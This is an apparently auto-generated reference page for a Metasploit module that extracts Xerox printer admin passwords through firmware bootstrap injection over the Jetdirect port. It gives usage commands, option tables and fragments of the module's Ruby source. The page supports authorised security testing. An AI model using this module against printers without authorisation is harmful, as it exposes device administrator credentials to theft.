Xerox Administrator Console Password Extractor - Metasploit
This page contains detailed information about how to use the auxiliary/gather/xerox_pwd_extract Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Xerox Administrator Console Password Extractor
Module: auxiliary/gather/xerox_pwd_extract
Source code: modules/auxiliary/gather/xerox_pwd_extract.rb
Disclosure date: -
Last modification time: 2019-11-05 18:32:45 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 80
List of CVEs: -
This module will extract the management console's admin password from the Xerox file system using firmware bootstrap injection.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Basic Usage
msf > use auxiliary/gather/xerox_pwd_extract
msf auxiliary(xerox_pwd_extract) > show targets
... a list of targets ...
msf auxiliary(xerox_pwd_extract) > set TARGET target-id
msf auxiliary(xerox_pwd_extract) > show options
... show and set options ...
msf auxiliary(xerox_pwd_extract) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Msfconsole Usage
Here is how the gather/xerox_pwd_extract auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/xerox_pwd_extract
msf6 auxiliary(gather/xerox_pwd_extract) > show info
Name: Xerox Administrator Console Password Extractor
Module: auxiliary/gather/xerox_pwd_extract
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Deral "Percentx" Heiland
Pete "Bokojan" Arzamendi
Check supported:
No
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
JPORT    9100             yes       Jetdirect port
RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT    80               yes       Web management console port for the printer (TCP)
TIMEOUT  45               yes       Timeout to wait for printer job to run
Description:
This module will extract the management console's admin password
from the Xerox file system using firmware bootstrap injection.
Module Options
This is a complete list of options available in the gather/xerox_pwd_extract auxiliary module:
msf6 auxiliary(gather/xerox_pwd_extract) > show options
Module options (auxiliary/gather/xerox_pwd_extract):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
JPORT    9100             yes       Jetdirect port
RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT    80               yes       Web management console port for the printer (TCP)
TIMEOUT  45               yes       Timeout to wait for printer job to run
Advanced Options
Here is a complete list of advanced options supported by the gather/xerox_pwd_extract auxiliary module:
msf6 auxiliary(gather/xerox_pwd_extract) > show advanced
Module advanced options (auxiliary/gather/xerox_pwd_extract):
Name            Current Setting  Required  Description
----            ---------------  --------  -----------
CHOST                            no        The local client address
CPORT                            no        The local client port
ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
SSL             false            no        Negotiate SSL/TLS for outgoing connections
SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE         false            no        Enable detailed status messages
WORKSPACE                        no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/xerox_pwd_extract module can do:
msf6 auxiliary(gather/xerox_pwd_extract) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the gather/xerox_pwd_extract auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/xerox_pwd_extract) > show evasion
Module evasion options:
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
TCP::max_send_size  0                no        Maxiumum tcp segment size. (0 = disable)
TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check the code snippets below, taken from the module source code, for possible causes. This can often help identify the root cause of the problem.
<RHOST>:<JPORT> - No credentials extracted
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - No credentials extracted" error message:
      print_good("#{rhost}:#{jport} - Credentials saved in: #{p}")

      register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd)

    else
      print_error("#{rhost}:#{jport} - No credentials extracted")
    end
  end

  # Trigger firmware bootstrap write out password data to URL root
  def write
<RHOST>:<JPORT> - Error connecting to <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error connecting to <RHOST>" error message:
    begin
      connect(true, 'RPORT' => jport)
      sock.put(create_print_job)
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
      print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
    ensure
      disconnect
    end
  end
<RHOST>:<JPORT> - Error getting password from <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error getting password from <RHOST>" error message:
      sock.put(request)
      res = sock.get_once || ''
      passwd = res.match(/\r\n\s(.+?)\n/)
      return passwd ? passwd[1] : ''
    rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, ::EOFError
      print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
      return
    ensure
      disconnect
    end
  end
<RHOST>:<JPORT> - Error removing print job from <RHOST>
Here is a relevant code snippet related to the "<RHOST>:<JPORT> - Error removing print job from <RHOST>" error message:
    begin
      connect(true, 'RPORT' => jport)
      sock.put(remove_print_job)
    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout
      print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
    ensure
      disconnect
    end
  end
Related Pull Requests
- #12543 Merged Pull Request: Fix: auxiliary/kerberos_enumusers stops after first match
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4123 Merged Pull Request: Cosmetic title/desc updates
- #4114 Merged Pull Request: Rescue the correct exception: Rex::HostUnreachable
- #4085 Merged Pull Request: Xerox Admin password extractor.
See Also
Check also the following modules related to this module:
- auxiliary/gather/xerox_workcentre_5xxx_ldap
- auxiliary/scanner/snmp/xerox_workcentre_enumusers
- exploit/unix/misc/xerox_mfp
- auxiliary/admin/vmware/vcenter_offline_mdb_extract
- auxiliary/gather/konica_minolta_pwd_extract
- auxiliary/gather/wp_ultimate_csv_importer_user_extract
- auxiliary/gather/wp_w3_total_cache_hash_extract
- auxiliary/scanner/printer/canon_iradv_pwd_extract
- auxiliary/admin/http/dlink_dir_645_password_extractor
- auxiliary/admin/http/dlink_dsl320b_password_extractor
- auxiliary/admin/http/netgear_soap_password_extractor
- auxiliary/admin/http/zyxel_admin_password_extractor
- auxiliary/gather/memcached_extractor
- auxiliary/gather/redis_extractor
- auxiliary/scanner/http/meteocontrol_weblog_extractadmin
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- exploit/windows/browser/facebook_extractiptc
- auxiliary/gather/coldfusion_pwd_props
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- auxiliary/scanner/http/titan_ftp_admin_pwd
- exploit/linux/misc/ib_pwd_db_aliased
- exploit/windows/ftp/ftpgetter_pwd_reply
- exploit/windows/ftp/ftpshell51_pwd_reply
- exploit/windows/ftp/xftp_client_pwd
- post/windows/gather/credentials/enum_picasa_pwds
Authors
- Deral "Percentx" Heiland
- Pete "Bokojan" Arzamendi
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.